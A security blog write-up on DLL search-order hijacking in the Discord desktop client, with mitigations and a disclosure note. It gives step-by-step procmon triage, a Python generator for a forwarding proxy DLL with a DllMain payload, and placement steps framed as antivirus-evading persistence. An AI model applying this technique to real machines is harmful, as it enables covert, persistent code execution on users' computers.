Discord Dll Hijacking, An Old Attack On A Popular Chat Application
While researching persistence techniques on Windows I came across a technique that is both interesting and applicable to many situations: DLL hijacking. I used it against one of the most popular chat platforms for Windows.

The Impact On Discord
The Discord desktop application loads DLLs in a way that allows code to be executed every time Discord starts: it looks for certain DLLs in its own program directory before the Windows system directories. Worse, that directory is writable by the current user, because the application is installed under the user's profile rather than in a protected location such as Program Files, so the attack needs no administrator rights. The technique can be used to maintain persistence on a target machine, and because it creates no new autostart entry or process of its own (the code runs inside the legitimate Discord process) it can slip past the persistence detection of many antivirus products. A video that shows this code execution in Discord is linked below.
The rest of the article covers the technical details of the vulnerability, how to find and exploit DLL hijacking in general, and how to mitigate it.
The Theory
To use DLL hijacking effectively, the theory behind it must be understood. DLL hijacking is tricking a program into loading a different DLL than the one it intended to load. The technique was discovered a long time ago but is not discussed frequently anymore. It can be used whenever the program's DLL search order is insecure. The search order is the sequence of locations the loader checks when a program asks for a DLL by name rather than by full path. By default Windows uses the search order shown in the diagram below: first the directory the application was loaded from, then the system directory (System32), the 16-bit system directory, the Windows directory, the current working directory, and finally the directories listed in the PATH environment variable (with SafeDllSearchMode disabled, the current directory moves up to second place). DLLs already loaded in the process and the names on the KnownDLLs list are resolved before any directory is searched at all.

The program directory (highlighted in red in the diagram) is the most frequent weak point in the Windows environment. The reason is that the loader searches it first, even for a DLL the program never shipped there, such as a system DLL it expects to come from System32. Anyone who can write to that directory can therefore drop a DLL with the expected name, and the vulnerable program will load and execute it the next time it asks for that DLL. The way this will be exploited here is with a proxy DLL: a DLL that forwards every exported function to the real DLL so the program keeps working, but also runs code of our own when it is loaded. I am basing this approach on a paper by Craig Heffner, but will document it a bit more thoroughly and with current tooling, showing an error that may be encountered and how to fix it, and providing a program that generates the forwarding code.
Theory In Practice
Finding and exploiting DLL hijacking with the proxy DLL method takes a few steps, and this part is divided accordingly. Discord is used as the example test program.
Step 1. Finding Insecure Dll Loading
The best tool for finding insecure DLL loading is Process Monitor (procmon) from Sysinternals. Open procmon, let it fully load, and then start the program under test; allow it to load completely. Save the log (File > Save) so the test program does not have to be rerun every time you want to look at the data; the saved log can be reopened in procmon at any time. Use the filter dialog to restrict the events to the test program's process name and to the CreateFile operation, and you will be given a screen that looks like this.

We are now looking for events whose Result is "NAME NOT FOUND", which means the program attempted to open a file that did not exist. Specifically we want DLL files that failed to load from the program directory: those are names the program resolves through the search order, and the first place it looked was its own directory. Path filtering (for example, Path ends with .dll) can be used to narrow the search, but in this case I simply looked through all of the results. After going through the list I found a suitable DLL, "bcrypt.dll", that Discord attempted to load from its program directory.

To verify, put a dummy file with that name in the directory. If the test program now shows an error when it starts, it tried to load the file, which proves that the attack can be implemented.
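The procmon triage above can be scripted instead of read by eye. The following is an added example, not code from the article or from the author's GitHub: it parses a Process Monitor CSV export (File > Save, CSV, default columns), keeps the CreateFile events of the chosen process that ended in NAME NOT FOUND for a .dll, and reports the ones probed in the program directory or, failing that, in any directory that looks user-writable. The CSV lines, the user name, the PIDs and the Discord version folder are constructed for the example.

```python
import csv
import io
import ntpath

# Constructed Process Monitor CSV export with the default columns. The paths,
# PIDs and the Discord version folder are illustrative, not captured.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:12:01.0001234 AM","Discord.exe","4321","CreateFile","C:\Users\alice\AppData\Local\Discord\app-1.2.3\bcrypt.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:12:01.0001300 AM","Discord.exe","4321","CreateFile","C:\Windows\System32\bcrypt.dll","SUCCESS","Desired Access: Read Attributes"
"10:12:01.0001400 AM","Discord.exe","4321","CreateFile","C:\Users\alice\AppData\Local\Discord\app-1.2.3\settings.json","NAME NOT FOUND","Desired Access: Generic Read"
"10:12:01.0001500 AM","Discord.exe","4321","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:12:02.0000100 AM","explorer.exe","1000","CreateFile","C:\Users\alice\AppData\Local\Discord\app-1.2.3\version.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:12:02.0000200 AM","Discord.exe","4321","CreateFile","C:\Users\alice\AppData\Local\Discord\app-1.2.3\bcrypt.dll","NAME NOT FOUND","Desired Access: Read Data/List Directory"
'''


def missing_dll_loads(csv_text, process_name):
    """Unique paths (first-seen order) of DLLs that process_name tried to open
    with CreateFile and that did not exist: the signature of a search-order
    probe that fell through to the next location."""
    seen = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        if not row["Path"].lower().endswith(".dll"):
            continue
        seen.setdefault(row["Path"], True)
    return list(seen)


def looks_user_writable(directory):
    """Cheap triage heuristic only: inside a user profile and outside the
    protected Program Files / Windows trees. Confirm on the machine with
    icacls <dir> before relying on it."""
    d = directory.lower()
    return (d.startswith("c:\\users\\")
            and "\\program files" not in d
            and not d.startswith("c:\\windows\\"))


def hijack_candidates(csv_text, process_name, app_dir=None):
    """Missing DLL probes worth testing with a dummy file. With app_dir given,
    keep only probes in that directory (the article's case); otherwise keep
    any probe in a directory that looks user-writable."""
    out = []
    for path in missing_dll_loads(csv_text, process_name):
        directory = ntpath.dirname(path)
        if app_dir is not None:
            if directory.lower() == app_dir.rstrip("\\").lower():
                out.append(path)
        elif looks_user_writable(directory):
            out.append(path)
    return out


if __name__ == "__main__":
    app = r"C:\Users\alice\AppData\Local\Discord\app-1.2.3"
    for p in hijack_candidates(SAMPLE_PROCMON_CSV, "Discord.exe", app):
        print("candidate:", ntpath.basename(p), "probed in", ntpath.dirname(p))
```

On the constructed log the only candidate is bcrypt.dll in the Discord directory: the successful System32 open that follows it is exactly the fall-through the search order describes, settings.json is dropped because it is not a DLL, and the version.dll probe belongs to another process. A real export will contain thousands of rows, which is why filtering on Result and extension first pays off.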

Now that this is confirmed, the proxy DLL must be written, as detailed in the next step.
Step 2. Writing The Proxy Dll
For the program to keep running normally with our malicious DLL in place, the proxy DLL must forward the real DLL's functions to the real DLL. The best program for listing the functions to forward is DLL Export Viewer. Open the program and load the legitimate DLL, which for "bcrypt.dll" and most other cases can be found in the Windows directory (on 64-bit Windows, System32 holds the 64-bit copy and SysWOW64 the 32-bit copy; take the one matching the target process, see the error fix below). After loading you should be greeted by a screen similar to this.

Generate a report of all the functions by going to View and clicking HTML Report - All Functions. Next, create an empty DLL project in Visual Studio and add a .cpp file. To proxy the functions, the report must be converted into code that forwards each individual export. I wrote a program that does this, located on my GitHub. Run my program with the HTML report file as input. Copy the code it produces into the .cpp file with "#pragma once" written above it. It should look like the image below; you can also compare with the proxy DLL for Discord, which is on my GitHub.

The name you entered for the real DLL appears right after the = in each forwarding line; in my case it is "payload", so the functions are forwarded to "payload.dll". With the forwarding code done, we can write the code we want to execute in the proxy DLL. I will have it pop up a message box that reports the location it was loaded from. That code is shown in the image below, and all of the code is on my GitHub.

Step 3. Using Our Proxy Dll
The proxy DLL code is now written. Compile it and rename the result to the original DLL name the test program tried to load, i.e. the DLL you are hijacking. Put the compiled proxy DLL into the hijack location, which in my case is Discord's program folder under the current user's local AppData. Run the test program; if everything is written correctly you will receive this error, except that the DLL name will be the one you entered.

All that is needed now is to copy the real DLL and name it as the DLL shown by the error. The real DLL Discord is trying to load is "bcrypt.dll", so I copy the real "bcrypt.dll", name it "payload.dll", and put it into Discord's program directory. When the program is now run it executes our code, as shown by the image below, and then continues normally.
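The generator and the proxy source that Steps 2 and 3 describe look like this in practice. This is an added example and not the author's GitHub tool: it reads a plain export listing (the ordinal and name columns copied from DLL Export Viewer, or the output of `dumpbin /exports`, both of which parse the same way) rather than the HTML report, and it emits the complete .cpp: one MSVC `#pragma comment(linker, "/export:Name=payload.Name,@ordinal")` forwarder per export, in the form Craig Heffner's paper uses, plus a DllMain that shows the proxy's own path in a message box as the article does. The export names in the sample are real bcrypt.dll exports; their ordinals and RVAs are illustrative.

```python
# Constructed export listing. Names are real bcrypt.dll exports; ordinals and
# RVAs are illustrative. Replace with the full list for the DLL you hijack.
SAMPLE_EXPORTS = """
    ordinal hint RVA      name
          1    0 0000A120 BCryptAddContextFunction
          2    1 0000A180 BCryptCloseAlgorithmProvider
          3    2 0000A1F0 BCryptDecrypt
          4    3 0000A260 BCryptEncrypt
          5    4 0000A2C0 BCryptGenRandom
          6    5 0000A330 BCryptOpenAlgorithmProvider
"""


def parse_exports(text):
    """(ordinal, name) pairs from any listing whose lines start with the
    ordinal and end with the export name (DLL Export Viewer columns or the
    'ordinal hint RVA name' lines of dumpbin /exports)."""
    exports = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) >= 2 and tokens[0].isdigit():
            exports.append((int(tokens[0]), tokens[-1]))
    return exports


def forward_pragma(name, ordinal, forward_to):
    """One linker directive: export `name` at its original ordinal and forward
    it to the same name inside <forward_to>.dll."""
    return ('#pragma comment(linker, "/export:%s=%s.%s,@%d")'
            % (name, forward_to, name, ordinal))


def render_proxy_source(exports, forward_to="payload"):
    """Complete .cpp for the proxy DLL: forwarders for every export plus a
    DllMain that runs our code when the host process loads the DLL."""
    lines = [
        "#pragma once",
        "#include <windows.h>",
        "",
        "// Forward every export to the real DLL, renamed %s.dll and placed" % forward_to,
        "// beside this proxy. Ordinals are kept so imports by ordinal still resolve.",
    ]
    lines += [forward_pragma(name, ordinal, forward_to) for ordinal, name in exports]
    lines += [
        "",
        "BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID)",
        "{",
        "    if (reason == DLL_PROCESS_ATTACH) {",
        "        // Payload. DllMain runs under the loader lock, so keep it short;",
        "        // real tooling defers its work rather than blocking here.",
        "        char self[MAX_PATH];",
        "        GetModuleFileNameA(hModule, self, MAX_PATH);",
        "        MessageBoxA(NULL, self, \"Proxy DLL loaded from\", MB_OK);",
        "    }",
        "    return TRUE;",
        "}",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(render_proxy_source(parse_exports(SAMPLE_EXPORTS)), end="")
```

Build the output as a DLL in Visual Studio for the target's architecture, rename it to bcrypt.dll, and place it next to Discord.exe together with the real bcrypt.dll renamed to payload.dll. The forwarder string names the module (`payload`) without the extension; the loader resolves it through the same search order, which is why the renamed real DLL sitting in the same directory is found first. Until payload.dll is present the host fails to start with an error naming it, which is the error Step 3 expects.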

Fix For A Frequent Error
An error that can occur is using the wrong architecture for the real DLL you are forwarding to. On 64-bit Windows there are two copies of most system DLLs: the 64-bit one in C:\Windows\System32 and the 32-bit one in C:\Windows\SysWOW64, and a 32-bit process that asks for System32 is silently redirected to the latter. The proxy DLL, the copy of the real DLL and the target process must all share one architecture. If they do not, you will receive the error below; it is fixed by copying the real DLL of the right architecture (and building the proxy for that same architecture).
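The mismatch can be checked before copying anything by reading the Machine field of each PE header. The following is an added example, not part of the article: it walks the MZ header to e_lfanew, checks the PE signature and returns the COFF Machine value, then compares it across the files involved. The `fake_pe` helper builds a constructed minimal header for the demonstration and test; on a real machine you would call `pe_machine_of_file` on Discord.exe, on your compiled proxy and on the candidate copy of the real DLL.

```python
import struct

# Machine values from the PE COFF header (IMAGE_FILE_MACHINE_* in winnt.h).
MACHINES = {0x014C: "x86", 0x8664: "x64", 0x01C4: "ARM (Thumb-2)", 0xAA64: "ARM64"}


def pe_machine(image):
    """Machine value of a PE image given its bytes: 'MZ' header, e_lfanew at
    offset 0x3C, 'PE\\0\\0' signature there, 2-byte Machine right after it."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (machine,) = struct.unpack_from("<H", image, e_lfanew + 4)
    return machine


def pe_machine_of_file(path):
    with open(path, "rb") as f:
        return pe_machine(f.read())


def architecture(image):
    machine = pe_machine(image)
    return MACHINES.get(machine, "unknown (0x%04x)" % machine)


def same_architecture(*images):
    """True when every image (proxy DLL, real DLL copied as payload.dll and
    the host .exe) carries the same Machine value."""
    return len({pe_machine(i) for i in images}) == 1


def fake_pe(machine):
    """Constructed minimal header, just enough for pe_machine(); it is not a
    loadable image."""
    hdr = bytearray(0x40 + 24)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew: NT headers at 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x44, machine)
    return bytes(hdr)


if __name__ == "__main__":
    proxy, real = fake_pe(0x014C), fake_pe(0x8664)
    print("proxy:", architecture(proxy), "real:", architecture(real),
          "match:", same_architecture(proxy, real))
```

A 32-bit proxy forwarding into a 64-bit payload.dll (or the reverse) is exactly the combination the loader rejects; when `same_architecture` is false, take the real DLL from the other of System32 and SysWOW64, or rebuild the proxy for the host's architecture.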

Mitigation
The way Windows loads DLLs is flawed, but there are ways to mitigate DLL hijacking. Most of these preventions must be implemented by the programmers, however. The practices listed in my article originate from this article on Finjan's blog. I recommend reading it, as it explains DLL hijacking very well and lists some examples.
Privilege
Simply making a program's folder writable only by administrators prevents programs running as a normal user from writing to these vulnerable locations and exploiting a DLL hijacking vulnerability. An install under Program Files gets this by default; a per-user install under the user's AppData, as Discord uses, does not.
Remote Shares
As noted by many articles on DLL hijacking, loading a DLL from a remote (network) share is not a good idea, as anyone with write access to the share can replace it. Loading a DLL from a remote share is, to my knowledge, not a common practice however.
Dll Load Location Path
Loading DLLs with a hard-coded, fully qualified path skips the search order entirely and so prevents search order hijacking; for system DLLs, loading with LoadLibraryEx and the LOAD_LIBRARY_SEARCH_SYSTEM32 flag achieves the same without hard-coding the Windows directory. Note that DLLs linked at build time are resolved by the loader before any of the program's code runs, so for those the only protection is the program directory itself not being writable.
Conclusion
DLL hijacking is still an issue today and can be used by malware authors to maintain access to a computer. The prevalence of this vulnerability is shown by its presence in Discord and by its history in many other programs, and many malware authors have targeted it. More must be done by program authors to protect users' computers by implementing secure DLL loading practices. Windows is also at fault for having such an insecure DLL search order in the first place.

Disclosure Of Discord Vulnerability
I contacted Discord security before I wrote this article and they did not deem it an issue. If you want logs of these emails, contact me at my Twitter handle @Acew0rm1.
